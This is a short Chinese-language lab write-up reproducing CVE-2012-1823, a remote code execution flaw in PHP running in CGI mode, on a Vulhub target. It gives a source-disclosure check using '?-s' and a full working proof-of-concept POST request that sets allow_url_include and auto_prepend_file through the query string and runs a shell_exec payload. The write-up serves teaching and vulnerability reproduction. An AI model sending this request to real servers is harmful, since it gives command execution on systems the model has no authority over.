PHP系列漏洞–CVE-2012-1823_PHP-CGI远程代码执行漏洞

漏洞简述

CVE-2012-1823就是php-cgi这个sapi出现的漏洞,我上面介绍了php-cgi提供的两种运行方式:cgi和fastcgi,本漏洞只出现在以cgi模式运行的php中。

准备环境

启动Vulnhub靶机环境:

验证靶机应用启用成功:

漏洞复现

在url处输入:IP:8080/index.php?-s 若出现源码,说明存在漏洞。

POC:

POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1

Host: example.com

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 31


<?php echo shell_exec("id"); ?>

漏洞利用成功